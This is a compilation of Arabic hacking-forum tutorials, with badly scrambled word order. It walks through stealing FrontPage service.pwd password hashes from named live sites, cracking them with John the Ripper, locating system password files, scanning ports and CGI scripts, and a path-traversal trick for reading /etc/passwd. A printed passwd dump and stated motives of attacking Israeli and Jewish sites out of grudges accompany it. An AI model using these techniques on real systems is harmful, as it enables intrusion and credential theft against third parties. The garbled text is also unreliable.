الهاكنج*: , في أسألة شوية أسألك عايز كنت أنا أحم أحم .سولعب*: , , األجهزة اختراق عن ماتكون بسياريت حبيبي تفضل ج
هذا !! العيال
كثير*: , تطوت أنا ال ال ستفضل*: أوكى ج
توضيح: , 2س يمكنك هل بيج الفرونت ثغرات عن كثيرا سمعت لقد الثغرة هذه استخدام . طريقة
االثنين: 2ج عيوني ومن حبي بالتأكيد :Dالتشغيل أنظمة في موجودة بتكون بيج الفرونت ثغرات & NT طبعا
Unix الـ سيرفراتها يدعم معرفة , FrontPage التي من وبتمكنكالموقع تبع األدمين سر كلمة
التالية الملفات في موجودة بتكون هذه السر :وكلماتAdministrator.pwd
Administrators.pwdAuthors.pwdUsers.pwd
المجلد في عادة بتكون vti_pvt_ التي
الملف هذه مثل http://www.tradesystemlab.com/_vti_pvt/service.pwd :مثال
الملف فتح تقريبا service.pwd وبعد هكذا بداخله مكتوب :هتالقي# -FrontPage-
tradesys:FpNTpIDWSk872المستخدم واسم المشفرة السر كلمة وهذه
كأدمين: , 3س الموقع على أدخل كيف ولكن ممتاز واااااو أووووه ؟؟ الكلمات S: بهذه
برنامج: مثل بي تي اف برنامج استخدام يمكنك ضع , WS_FTP ج أوكلمة www بدل الموقع عنوان هذا ftp في ftp.ebnmasr.com :مثل
اسم , الموقع منك وسيطلب العنوان شريط في بموضعه وقمللموقع المرور وكلمة المستخدم
وكلمة: 4س المستخدم باسم ليشمايدخل ولكن حبيبي مشكور هذه )N( ؟؟ tradesys:FpNTpIDWSk872 : السر
طريق: !! , 4ج عن تشفيرها فك يمكنك مشفرة ألنها بساطه بكل برنامج مثل من , John The Ripper برنامج نزلهhttp://www.openwall.com/john:هنا
تشرحهولي: , , 5س ممكن البرنامج هذا أستخدم ماأعرف لكني أها ؟؟ سمحت القناصلو العزيز أخي
الخدمة: !! , 5ج في أنا ياولد مني : التستأذن أول, انت شوف مجلدين , فيه هيكون ضغطه وتفك البرنامج الي , doc & run :ماتنزل
مجلد هو ماتفتح: , run يهمنا وبدل نفسك على تسهل عشان شوفالبعضما وكمان وهالمشاكل البرنامج مجلد على الدوسوتدخل
هاألشياء يعمل : p: بيعرفعن جهازك في في command.com :ابحث والصقه بنسخه وقم
؟؟ , run مجلد أوكىهذه السر كلمة ملف tradesys:FpNTpIDWSk872 :وجيب في وحطها
txt باسم passwd مجلد في وضعه بفتح , run مثال تقم , john.exe والالتالية command.com افتح األوامر فيه :واكتب
john -single passwd.txt << التي السرية الكلمات عن لك ليبحثالمستخدم السم مطابقه تكون
john -i:Digits passwd.txt << فقط األرقام عن لك ليبحثjohn -i:Alpha passwd.txt << الصغيرة الحروف عن لك ليبحث
john -i:all passwd.txt << االحتماالت جميع عن لك وأنا ( , ليبحثمعي , الفك عملية بتطول كده عشان األمر هذا أستخدم طول على
:D (المشفرة السر كلمة ستجد الكلمة فك من البرنامج ينتهي وبعدما
هذا بالملف john.pot :والمفكوكه
؟؟: , , 6س تشفيرها هيفك أنه متأكد كثير طول البرنامج يااااااهأخذ: , 6ج لو حتى النهاية في تشفيرها يفك الزم أيوووووه
االحتماالت ;( , جميع بيجرب ألنه .أسبوع
لوحة من زر أي على بالضغط البرنامج حالة تعرف وممكن المفاتيح
السر: , 7س كلمة انفكت خالص لله الحمد )Y( , اسم وين لكن؟؟ المستخدم
هذه: 7ج السر كلمة في : tradesys:FpNTpIDWSk872 , اسم هيكونعالمة ( tradesys :المستخدم قبل بتكون الي الكلمة ) : يعني
؟؟: , 8س الموقع من هالثغرة كيفجبت تقولي ممكن قنااااااص :$جبتها: ,,, ;( , 8ج بصراحة أنا الخجالن هالوجه وليه هههههههههه
عليه , تعمل ممكن موقع عنك كان لو انت ولكن العشوائي بالبحثعمران برنامج فحصمثل ببرنامج لدي ( سكان عشان ) D: المفضل
بالموقع الموجودة الثغرات تطلع
واحد: , 9س هأسأل ده فات الي عالجواب سؤالين عندي أنا طيب ؟؟, األول هذه العشوائي البحث طريقة ايه
محرك: , : في معينة ثغرة عن تبحث انك الطريقة هذه أحم أحم جالـ يستخدم الثغرة spiders بحث فيها كثيييرة مواقع تالقي عشان
لك , , أقولك لن لكن السبايدرز بتستخدم كثيرة مواقع طبعا في هذهالموقع , هذا اال منها واحدة أي موقع walla.co.il :على هذا وطبعا
اسرائيلية , مواقع تكون النتائج معظم عشان . ); اسرائيلي
زين: , , 10س مافهمتك ؟؟ معينه ثغرة عن تبحث يعني كيف ممممم !!
الفرونت: 10ج ثغرات عن للبحث اال هالمواقع ماأستخدم والله أنا سابقا :$ , , ذكرها تم التي الثغرة عن تبحث عايز مثال انت يعني بيج
هذه , , واحدة كلمة غير كاتب مانت ؟؟ ايه service.pwd :هتكتب
كيفية: , , 11س عن كمان أسألك عايز كنت حبيبي مشكور أهاااااا الثغرات على السكان برامج عمل
الـ: 11ج أو الثغرات من كبيرة مجموعة فيها بتكون هذه البرامج EXPLOITES , , وتطلعلك الموقع على ثغرة ثغرة تجرب وبتبدأ
الـ, النتائج منه تجيب عشان رهيييب موقع وفي EXPLOITES , هو . /http://www.ussrback.com :هذا
،،،انتهى
الثغرات CgiScaner برنامج " عن " للبحث
>منقول<> هاجر: بو >الكاتب
الثغرات عن للبحث رائع برنامج هنا
خروج 1رقم .المستخدمة 2رقم الكودات أظهار .
البحث 3رقم بدأ .للضحية 4رقم العنوان تضع .
الموقع فى الموجودة الثغرات لك يظهر وسوف البرنامج .وأترك
البرنامج ..وصلةhttp://mypage.ayna.com/vox99/cgiscan3.zip
،،،انتهى
المواقع " في المفتوحة المنافذ لمعرفة سكان سوبر برنامج " شرح
> نت شامل منتديات من >منقول> مشاريو: >الكاتب
المفتوحه ::: المنافذ عن بالبحث يقوم البرنامج هذا بالبرنامج تعريفجهاز في
يصيد ,,, وال ضعيف الباحث فيها يكون البرامج بعض الن الضحيه
السبسفن برنامج ذلك امثلة ومن مفتوح منفذ به بي اي ايان ,, رغم جولد
هذا فنستخدم الباحثضعيف ان اال ممتازه اتصاله وقوة البرنامجكاداة البرنامج
’’’’’ مساعده
التشغيل " أنظمة في الباسورد ملف وجود " اماكن
> الحلم منتدى من >منقول> هنتر: بالك >الكاتب
ليونكس نطم في/etc/shadow
ميكروسيستيمز صن نظم في/etc/shadow
ال نظم عامه BSDفي بصفه/etc/master.passwd
جرافيكس السيليكون نظم ARIX المسمى SGI في/etc/shadow
المسمى ام بي اي AIX نظام/etc/security/shadow
يونكس )) - )) ترو اكس يو اتشبي عامه يونكسبصفه 64نظم الريسك)) ونظم بالمنفريم االلفا (( (( ((64خاص وبعضمنتجات
/etc/shadow
)) تشفير تعتمد االصدارات هذه )) القوي MD5 اغلب
عامه بصفه ويندوز )) NT - XP - 2000 (( نظمبتشفير (( المفعل )) LanMan الملف
/winnt/system32/config/sam )) بفتحه يسمح وال النظام من االقالع عند اال عادة مغلق الملف هذا
صالحيات لديك كان ولو حتى يعمل النظام طالما نسخه او )) االدمنيستريتور
)) االحتياطي )) الملف/winnt/repair/sam or sam._
سيرفر )) - الويسلر واصدارات البروفيشينال اكسبي الويندوز فيسيرفر (( ادفانسد
مجلد في الويندوز تجد WINNT لنالعادي كالويندوز سيكون .Windows ولكن
،،،انتهى
" ) األول ) الجزء الموقع " اختراق
> اإللكتروني الجهاد موقع من >منقول
: مقدمه
هذا كل مر لماذا اعرف وال الدرسالسابق منذ طويلة فترة مرتو .. الموضوع لصعوبة ربما الدرس هذا كتابة في ابدأ أن دون الوقت
و .. التشعب و الصعوبة لمجابهة الوقت حان قد ها لكن و تشعبه
الممتع الموضوع هذا عن بسيطة فكرة حتى لو و .. تقديم
تعريف بساطه Telnet سأعيد اكثر بطريقه لكن و جديد .. منTelnet الجهاز ،و جهازين بين وصله إنشاء في يستخدم برنامج هو
المنفذ رقم و المستهدف الجهاز عنوان يستخدم الذي Port المتصل ) آخر ) برنامج يشغل الخادم المستهدف الجهاز ،و عليه االتصال سيتم
)Daemon( واالستقبال اإلرسال عمليه تتم و المنفذ هذا على يستمعالبروتوكوالت أحد . باستخدام
فرنسا : في رجل هناك نفترضأن العملية حياتنا من تشبيه ) ( ) ( ) أنت) و وصله معه حوار إقامة تريد المتصل أنت و المستهدف
اتصال .. وسيله استخدام من لك فالبد مصر لنفرض )Telnet( في وأذنه على يضعه أن للرجل البد الذي الهاتف لكي )Daemon( أنها
فالبد .. .. إذن العربية يتحدث ال الرجل هذا أن أيضا لنفرض و يسمعك ) تتحدث ) حتى المستخدم البروتوكول الفرنسية استخدام من لك
) بحريه) واالستقبال اإلرسال .
أن نستنتج سبق ( .. Telnet مما البد ) انه و الهاتف مثل وصله مجرد هوفي ننجح حتى االتصال في المستخدم البروتوكول معرفة من لنا
من . البد أنه أيضا نعرف أن من لنا البد انه كما االستقبال و اإلرسالعليه Daemon برنامج االتصال المراد المنفذ على . يتسمع
FTP Client ك Telnet استخدامنقل بروتوكول استخدامنا حاله في عليه االتصال سيتم الذي المنفذسيكون FileTransfer Protocol الملفات الغالب 21في ..
؟ إذن الصعوبة أيننستخدم لكي أننا في تكمن علينا FTP Client ك Telnet الصعوبة يجب
ببروتوكول كبير بقدر !! FTP اإللمامالتعامل كيفية إلظهار عرضبعضاألمثلة من يمنعني لن هذا لكن و
البروتوكول هذا .. مع
االتصال بدءبتشغيل -1 على Telnet قم شبك 21بالمنفذ ftp.zdnet.com و
لك سيظهر ما هذا و
Sources Code - شفرة
220 l19-sj-zdnet.zdnet.com NcFTPd Server )licensed copy( ready.
يسمي السابق السطر FTP Daemon الخاصبال Banner وموقع في الذي zdnet المستخدم الموقع باختالف تختلف هي و
نجاح . على يدل البداية في الموجود الرقم و عليه التشبيك سيتمثابت رقم هو و . االتصال
المستخدم -2 اسم باستخدام الولوج هي التالية Username الخطوةالسر كلمة أن .. Password و المستخدم zdnet بما Anonymous تدعم
كالتالي للنظام الولوج في استخدامه :سيتم ستكتب
Sources Code - شفرة
user anonymous
بالتالي الخادم سيستجيب و
Sources Code - شفرة
331 Guest login ok, send your complete e-mail address as password.
التالي أنت تكتب ثم
Sources Code - شفرة
pass @zorro
بالمستخدم الولوج عند بالطبع عنوان Anonymous و بإعطاء تقومبريدك .. إعطاء ترد لم إذا و السر ككلمة الخاصبك اإللكتروني البريد
على ) يحتوي أي البريد شكل يأخذ شئ أي تكتب أن فيمكنك @ (الرمز
بالتالي الخادم سيستجيب و
Sources Code - شفرة
230-You are user #552 of 2000 simultaneous users allowed. 230-
230 Logged in anonymously.
الرقم .. في إال آلخر موقع تختلفمن قد اإلستجابه تلك بالطبع وسطر كل بداية .. في
بنجاح الخادم إلى بالولوج قمت قد اآلن . أنت
إلرسال وصله إنشاء يجب للنظام الولوج عمليه تمت أن بعد.. ) ذاتها ) الملفات أو الموجودة بالملفات قائمه البيانات واستقبال
!! إنشاء هو قليل منذ فعلناه قد ما ؟ قليل منذ نفعله كنا الذي ما إذنعلى النظام استجابة استقبال و للنظام األوامر إلرسال وصله
. األوامرطريقتين ،هناك الوصلة تلك ننشئ لكي و
) رقم : ) أنت الزبون يرسل بان الوصلة الطريقة هذه تنشئ IP األوليفي استخدامه الخادم يستطيع الذي المفتوح المنفذ و به الخاص
البيانات . إرسالهذا و جهازك على المنافذ أحد فتح منك تتطلب الطريقة تلك لكن و
تلك .. نستخدم لن لذلك و المنفذ هذا خاصلفتح برنامج سيتطلب . الطريقة
األمر : الزبون يرسل بان الوصلة الطريقة هذه تنشئ PASV الثانية
Sources Code - شفرة
PASV
برقم الخادم سيرد الخادم ) IP و على المفتوح المنفذ و به الخاص ) عليه( ) االتصال أنت الزبون يستطيع الذي .. بالطبع
مثال
Sources Code - شفرة
227 Entering Passive Mode )207,189,69,61,12,41(
كالتالي األقواستفسيره بين الموجود الطويل الرقم .. و ) ال ) هو اليسار من مجموعات أربع هذه IP أول في و بالخادم الخاص
يكون رقم .. 207,189,69,61الحالة فيمثالن التاليان الرقمان أما كالتالي حسابه يتم و المنفذ
12 × 256 + 41 = 3113
فتح هي اتباعها الزبون على يجب التي التالية فالخطوة لذلك والمنفذ على الخادم مع جديده هذا .. 3113وصله بمثل تقوم ولكي
نافذة فتح عليك يتوجب على Telnet األمر تشبك و جديدهftp.zdnet.com 3113بالمنفذ ..
و األولى النافذة من سترسله األوامر أحد ترسل أن تريد عندما إذنالبيانات بها ستظهر الثانية .. النافذة
مثالاألمر ترسل ) LIST عندما ) في الدليل لعرضمحتويات يستخدم
األولى النافذة
Sources Code - شفرة
LIST
أيضا األولى النافذة في بالتالي الخادم سيستجيب
Sources Code - شفرة
125 Data connection already open; Transfer starting.
االتصال غلق سيتم ثم الثانية النافذة في الدليل محتويات ستظهر والدليل عرضمحتويات إتمام بمجرد الثانية النافذة . في
استقبال أو ما دليل عرضمحتويات أمر ترسل أن أردت كلما هكذا وبأمر تبدأ أن يجب ، ما ملف إرسال جديدا .. PASV أو اتصاال تنشئ ثم
السابقة الخطوات باتباع المنفذ رقم حساب . بعد
نفسي .. امنع أن استطع لم لكنني و تماديت قد أنني أظن و هنا إلى) إلي ) بالنسبة ممتع الممتع الموضوع بهذا مشاركتكم . من
هامة مالحظاتاستخدم .. - أن الهراء هذا كل من بدال أستطيع أال اآلن تتساءل لربما
مثل جاهز أن!! CuteFTP برنامج يضرك لن لكن و تستطيع بالطبع ؟تعلم بعد ربما و تستخدمه الذي البروتوكول عن شيئا تعلم
الخاص برنامجك تصنع أن تستطيع البروتوكولاسأل - ثم تماما الفكرة تستوعب حتى مرتين و الدرسمره اقرأ
شئت فيماالتالية - المواقع بزيارة قم الموضوع هذا عن اكثر لتعلم
http://www.vbip.com/winsock/winsock_ftp_01.asp ) بشده به )ينصح
http://www.vbip.com/winsock/winsock_ftp_ref_01.htm ) به ينصح )بشده
http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html ) اراد لمنالبروتوكول في .)التعمق
،،،انتهى
" ) الثاني ) الجزء المواقع " اختراق
الجهاد < موقع من >منقول> الكندور: >الكاتب
: اإلختراق~~~~~~~~~
. المقدمة -؟ - الموقع حول معلومات أجمع كيف
؟ - الضعف نقاط كشف يتم كيف؟ - المكتشفه الضعف نقاط إستغالل يمكن كيف
المرور - كلمة ملف ؟ password file ماهو؟ - الملف هذا يفيدني بماذا
الباسورد - ملف خالل من السر كلمة معرفة يمكن password كيفfile ؟
الملف - كان إذا بين كان )encryption مشفر( ماالفرق مضلل( وإذاshadowed( ؟
؟ - كسره يتم كيف ، مشفر المرور كلمة ملف كان لو وماذا؟ - أعمل ان علي ماذا ، مضلل المرور كلمة ملف كان ولو
-: المقدمة~~~~~~~~~
أنا ! فقط موقع يخترق أن أراد وليسلمن للباحثين المستند هذا أعدإني تتوقع ال ، عنه أتحدث ما كل لفهم الالزمه الخبره لديك أن أعتبر
برنامج نزل لك هذا ) Void Eye مثل ( بقول في لك وحط غيره أوهذا المقزز العمل ، مواقع إخترق لك وقول بالصور شرح المستند
أبدا له نتطرق لن
؟ - موقع حول معلومات أجمع كيف~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
تستخدم أنصحك ، سكان بورت هي تصلحها خطوه nmap أولما إذا هذا عنها تبحث أن اإلطالق،يمكن على واألقواء المشهوره
الموقع في www.inscure.org/nmapلقيتها نظام على تعمل وهيبـ انصحك ويندوز على يعمل برنامج أردت إذا ، ، SuperScan ليونكس
التي المواقع آالف تجد سوف ، اإلنترنت في عنها البحث عليكنصوص تستخدم أن الممكن ومن ، لتنزيل البحث Perl تقدمها لعمليه
لغه ، Perl بعد الهاكر جميع لدى محبوبه اللغه C أصبحتعلى تجربه نصلح مثال ، النتائج على الحصول بعد
رقم ) /http://www.7lem.com الموقع وضع تطلب البحث برامج بعضإستخدم عندها الدوماين والتقبل ، للموقع بي لتعرف ping اآلي
بي اآلي )رقمالبورتات ) ، النتائج -514 - 513 - 143 - 110 - 37 - 25 - 23 - 22 - 21تأتي
نزع( 587 بعمليه نقوم ، هنا لها نهتم لن لكن أخرى منافذ ويوجد للمنافذ ...التواقيع
للمنافذ؟ التواقيع نزع عمليه ماهيبهذا اإلتصال عند ، تطبيق قبل من فتح المنفذ أن المعروف من
بالبورت إتصلت لو مثال ، اليك رد إرجاع يتم فسوف وهو 23المنفذ وموقع ، /http://www.7lem.comلتلنت ويتضح ، تلنت خدمه به توجد
اتلنت بخدمه ،اإلتصال المنافذ مسح عمليه من هذاtelnet http://www.7lem.com/
في التالي األمر تنفيذ FreeBSD و SunOS و Linux و Windows يتمأفضل QNXو ولكن ، لينكس Linux بنفسالصيغه ألن وهو ، عنهابـ ... يختص ال المستند هذا أدوات من ماتحتاجه كل لذلك Linux يوفر
التلنت بورت على الحلم بسيرفر اإلتصال نتيجه تأتي ، أذكرها لن
---------------------- SunOS 5.7
: login ----------------------
نظام على يعمل السيرفر بأن ، SunOS 5.7 يتضح تنتزع أن عليك بقيوإصدارته التطبيق هو ما لتعرف المتبقيه البورتات من التواقيع
لها ) ( نقاطضعف عن ببحث تقوم وثم ، التلنت إستخدم لها المنصتهي التاليه الخطوه ، بها الخاصه اإلستثمار شيفرات على وتحصل
نذهب ، النظام هذا على يعمل الذي الويب ملقم هو ما تعرف أنليونكسونكتب تبع الترمينال الى
nc http://www.7lem.com/ 80
---------------------- . . .
Apache/1.3.* Server . .
----------------------
لحمايه وذلك الويب ملقم إصدار تضليل وتم النتيجه أختصرتبنفسك كشفه تستطيع أن اتمنى ، ...الموقع
البورتين بأن بورت السكان عمليه من المعروف 25و 110من ، اإللكتروني البريد خدمة الموقع في أن على يدل هذا ، مفتوحين
لمعرفه يفيدك هذا فعله pop و smtp بالطبع ماعليك كل ، للموقعالتالي األمر كتابه ) Linux في( هو
host 7lem.com
النتائج وأنتظر
تقنيه :- جو عائشفي ولست الدن بن تعيشمع كنت إذا مالحظهما ) علىحسب تفجيراإليميل هو فعله عليك ما كل معلومات
) الناس من كثير يسمياهاتغيير :- تم أنه أو تلنت خدمه السيرفر في تجد لم إذا ثانيه مالحظه
تستخدم .... أن عليك ، الخ النظام قرصنه مثال طريق عن التوقيعqueso على تعمل وهي ، التشغيل نظام لكشف المفضله األداة
كتابه عليك إلستخدامها ليونكس،queso http://www.7elm.com/
كتابه هو جهازك في األداة تثبيت بعد ماعليك مسافه queso كل وثمالبورت ورقم جميع 80والموقع في مفتوح الحال بطبيعه هو والذي
النظام... بأن الرد يأتيك SunOS 5.7 المواقع
في الموجوده بالبريدات قائمة مثال أردت لو أو webmaster أو support ( مثال /http://www.condor.com موقع
info ...الـ ) الخ معرفه أدرت من DNS أو أو ، للموقع والثانوي األوليالتي الشركه هي وما عنه ومعلومات الليسجل الشخص هو
خدمه بإستخدام عليك ، الموقع ، whois تستظيف إستخدام تستطيعبيانات whois خدمه قواعد من معلومات طريق whois وتطلب عنأكتب whois أمر ، لينكس إذا man whois في ، المعلومات من لمزيد
برمجيات الى بالتوجه أنصحك أخرى بيئه أي أو ويندوز تستخدم كنتالموقع في المتواجد آي جي السي
http://www.psyon.org/tools/index.html التي آي جي السي برمجيات من مجموعه الصفحه هذه لك توفر
ويب موقع عن معلومات لطلب رياضيات هناك ، المهمه لك تسهلالموقع whois بإستخدام الى توجه حال كل على ، جدا مفيده وهي
التفاصيل من لمزيد التاليhttp://www.google.com/search?q=whois&btnG=Google+Search
؟ - الضعف نقاط كشف يتم كيف~~~~~~~~~~~~~~~~~~~~~~~~~~
مثل برامج تستخدم هذه ShadowSecurityScaner أو void eye ال !! يستخدم ال محترف يكون يبغا واللي المحترفين ، فقط للمغفلين
، يخترق يبغا أنه لمجرد يخترق وال ، اإلختراق عمليات في برامج ، المحكم والتخطيط ، المتناهيه بالدقه تمتاز سيرفر إختراق عمليه ، مرتكبيها إكتشاف يصعب التي هي المحكمه السطو عمليات وكل
حاطه وين الله ومايدري برنامج يشغل اللي من كنت لو والله لكن ، شئ تخترق قدرت لو هذا ، عمرك طول تفلح ماراح إنك فصدقني
تصطاد فسوف البرامج هذه من بواحد اإلختراق وتم حدث فلوكالسمكه تماما بسناره
بعد اال عنها يكشف وال كأسرار تعتبر والتي المفضله الضعف نقاطمثل الويب ملقم في التي هي طويله ، IIS أو Apache فتره وكذلك
سكربتات في الموجوده الضعف ، PHP و Perl و CGI نقاط التي أو
أو البيرل نصوص لتفسير المستخدم البرنامج في موجوده تكون قدالممكن من مثال لتسوق برنامج الموقع في كان وإذا ، آي جي السي
في شئ اي يعني ، به وجدت إذا هذا ضعف نقطه فيه تستغل أن .. برنامج كان أو آي جي سي أو بيرل سكربت كان سوى السيرفر
ضعف بنقطه مصاب الويب ملقم أو التشغيل نظام حتى أو تنفيديمن بداخله ما ويعرضكل لإلختراق السيرفر يعرض أن الممكن من
معي مره حادثه لكم سأختار ، المخترق الى أسرار ، زورا عداد
counter عرضموقع mp3 ونزلت الموقع مادخلت أول ، لحظه أي في لإلختراق مشهورحبيت Don't Tell Me أغنيه فيه تنزل االغنيه كانت اللي الوقت في
أتوقع كنت ما ، التحميل ينتهي أن الى وقت وأضيع الموقع أشوفالتلنت فتحت ، فيه نقاطضعف بالقي أني
مثل معروف بورت كم على دخلت 110و 21و 23و 25وشبكت ، الخ المنتدى إسم واخذت الموقع في توجهة Ikonboard v2.1.8b منتدى
ولكن ، المنتدى نقاطضعف عن بسرعه فيها وبحثت موقع كم الىلـ الضعف نقاط ، Ikonboard v2.1.7b وليس Ikonboard v2.1.8b كانت
السورستبع فتحت ، ثاني شئ على ندور ورحنا المنتدى تركناعن وبحثت ، pl و cgi الصفحه ، توصيت علبة ، ثاني سكريبت وجدنا
البحثعن نكمل ، تماما شئ ال ، لها نقاطضعف عن نبحثعند لألغنيه التحميل وصل وعندما وأخيرا ، كنت % 80السكريبتات سكريبت ضعففي لنقطه توصلت ، cgi قد الزوار لعداد خاص
الملف طلبت ، السيرفر ملففي عرضأي من etc/passwd تمكنككان والنظام مضلله كانت المف في المسجله المرور كلمة وطبعا
في FreeBSD هو ولكن الدليل نفس في تكون المرور كلمة يعنيوهوالملف ثاني ، master.passwdأو shadow ملف اآلن بالك التشغل
ستعرفه .. هذا كل الملف هذا ومافائده مضلله كلمة تعنيه بمافقط ... القراءة في إستمر قريبا
++++++++++++++++++++++++الثاني الجزء
{ http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi } هذا CGI ، نكمل ال لنشر الجديده الحركات هي هذه ، تستغرب ال
.... الموضوع
بو ولد عنتر عليهم وصلح بدمره والله يهودي موقع هذا قلت ماورد ، ولصق نسخ لها صلحت ، الضعف لنقطه رساله أرسلت ، شدادعن حسنه فكره وأخذ لديهم الجديده باألغاني وقائمه بالشكر علي
حكوماتهم اللي اإلرهاب فكره من بدل العرب وعن المسلمينعقولهم في تزرعها
الموقع : مثال تم timduff.com لنأخذ وقد ، التدمير يستحق موقع هذامن القليل اال يحوي وال جديد من ولكن إرجاعه تم اآلن وهو ، ذلك
إثنتان تتجاوز ال الصفحات
بأنه اإلنجليزيه الهاكرز منتديات أحد في الموقع هذا عن سمعتواعرف ألسجل للموقع فذهبت ، بالضبط هي ما أعلم ال خدمه يقدم
بريد الى معلومات إرسال طريق عن التسجيل كان ، ماهيكا ، تقريبا ساعتين بعد الرد وصلني ، معلومات ارسلت اإللكتروني
حش كله كالم اال أقراء كنت ما ، حشوسب كله يكون الرد أن كنتكلمة ذكري هو السبب لي تبين ، ليش ، i'm from saudi arabia وسب
، أحقد والثاني يوم وكل ايام ومضت ، الحقد هذا كل لماذا ولكنالويب لملقم ولقينا توفقنا أن اال ، عنصريته عشان وأكثر أكثر عليه
تقدر ، مرقوعه غير اآلن واال ، روسي موقعي ضعففي نقطه حقهكل منها تسحب وتقدر ، السيرفر في الموجوده الملفات تعرضكل
هذا إل آر اليو طريق عن ، ماتريد
من /../../../../../../../../../../../../../../../../../ حتى أو وثم الموقع عنوانتعرض /../ ما عرفت هل ، فقط الموقع عنوان بعد تضع أن الممكن
االخيره هذه ! لك
ما موقع نقاطضعفعلى لكشف األساسيه النقاط أضع سوف اآلن:-
السيرفر -1 على الموجوده الخدمات كافه على التعرفوأي -2 الويب ملقم وكذلك وإصدارته التشغيل نظام معرفهأو ، ممكن ذلك كان إذا بيرل نصوص مفسر مثل أخرى برمجيات
الخ ..... والشراء للبيع برنامجالسكربتات -3 كل إللتقاط جلسه في ) Perl - Cgi ( عمل الموجوده
منها شئ وجد إذا هذا ، الموقعنقطه -4 البورت في يكون أحيانا ألنه ، معها البورتات تحط والتنسى
صحيحا ليسهذا ، البورت% 100ضعف في ليست الضعف نقطه تعبير ) أقرب هذا للبورت إنصات مصلح اللي البرنامج في ، بعينه
لها(في -5 عليها حصلت التي المعلومات من اإلستفاده يمكنك أخيرا
من ) مواقع المستند هذا آخر في يوجد نقاطضعف عن البحثعلى الحصول في تفيدك قد أرشيفات على تحتوي مواقع ظمنها
الثغرات(
؟ - المكتشفه الضعف نقاط إستغالل يمكن كيف~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
التي تلك هي يستخدمها أن مبتدي أي يستطيع والتي الثغرات أبسطإلختراق ذكره السابق المثال مثل ، المتصفح خالل من تنفذ
/http://www.timduff.comالموقع
على ) إستثمار إسم نطلق سوف اآلن من اإلستثمار يكون ، آخر نوع ) شفره شكل على اإلستثمار يكون الثغره بها تستغل التي الطريقه
) ببرنامج) مكتوب كود sh بالعربي يسمى ما وهو ليونكس، فيوباإلنجليزي الغالف ملف shell برنامج تحت الشفره هذه وتكون
من sh.* باإلمتداد النوع وهذا ليونكس، بيئه تحت وتعمل
لتعدد ونظرا بالقوه ويحسسالمخترق المفضل هو اإلستثماراتلغه ليونكسفإن في كتابه shell األداوت تقابل فهي قويه اصبحت
ويندوز في دفعاتي )bat( ملف
) بلغه ) مكتوب كود شفره وهو ثاني اإلستثمارات من نوع C ويوجدالترجمه عمليه أثناء أخطأ فيه تحدث ما غالبا النوع وهذا ، المشهوره
في خلفيه لديك تكون أن يجب لذلك المتاعب من كثير تواجه قد ، ليونكسوترجمته الى بالذهاب عليك النوع هذا ولترجمه ، سي لغه
المترجم gcc بإستخدامgcc Exploit.c -o Exploit
مهمه للمف ( مالحظه اإلمتداد يكون أن ، C.* وليس c.* يجب كان لو، ++ c حرف سي في كتب وكأنه اإلستثمار يترجم فسوف كبتل
المكتبات توفر من تأكد الثاني اإلستثمار )h.*( الشئ يتطلبها التيتشغيله )قبل
تنفعك قد البرمجه في مستندات فهناك موقعي زياره عليك
شفره أيضا وهو ينتشر وبداء اإلستثمارات من مؤخرا ظهر نوع يوجدبلغه مكتوبه من Perl ولكن النوع هذا تشغيل يتم أن الممكن ومن
شفرات ) يفسر برنامج تملك أن يجب ويندوز الدوسفي موجه) بيرل أكتيف مثل البيرل
خطوات شكل على تكون قد اإلستثمارات من نادره انواع .... وأحيرا
Exploit = إستثمار
المرور - كلمة ملف ؟ password file ماهو~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
توجد داخله في الذي هو ، إسمه من معروف المرور كلمة ملفهذا مثل ، السيرفر الى بالدخول المرخصلهم األشخاص حسابات
------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail
Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh ----------------------------------------------------------------------------------------------
-- أختصر باألعلى الموضح الملف هذا أن حيث ، بكثير أكثر تكون وقد
ليسكل ، السطور آالالف على يحتوي كان سحبه فعند ، كبير بشكليتجاوز ال من منها فيوجد الحجم بهذا المرور كلمات 10ملفات
تعرف عليك الحين أنت العموم على ، بكثره الموجوده وهي أسطراألشخاص حسابات توجد داخله في الذي هو المرور كلمة ملف بأن
السيرفر الى بالدخول ...... المرخصلهم
؟ - الملف هذا يفيدني بماذا~~~~~~~~~~~~~~~~~~~~~~~~~~
لكي المستخدمين وإسماء السر كلمات معرفه في الحبيب يا يفيدكتكون ...! المرور كلمة التفرح ولكن ، الموقع بإختراق تقوم
في ولكن زمان مشفره كانت ، تماما ليسصحيحا هذا ال ، مشفرهمضلله هي الحالي الوقت
مضلله = x او* سر Shadowed كلمة
EpGw4GekZ1B9U = مقياس على مشفره سر ، DES كلمة النوع هذاليونكسو في المستخدم التشفير األنظمه FreeBSD من من وعدد
من مكون دائما وهو ، ضعيف وسمول 13األخرى كبتل ورقم حرف يستخدم فهو ويندوز بإستثناء ، ابدا رمز على بينها من يحتوي وال
أيضا ضعيف نوع وهو التشفير من آخر نوع
الباسورد - ملف خالل من السر كلمة معرفة يمكن password كيفfile ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~ من Ctrl + Shift إضغط لتقراء المفاتيح لوحه من األيمن القسم في
لملف مثال وضعت حيث االعلى الى إذهب ثم ، اليمين الى اليسارالموقع من سحبه تم مرور ... hwwilson.com كلمة
السطر هذا -: تفسيرroot:x:0:1:Super-User:/:/sbin/sh
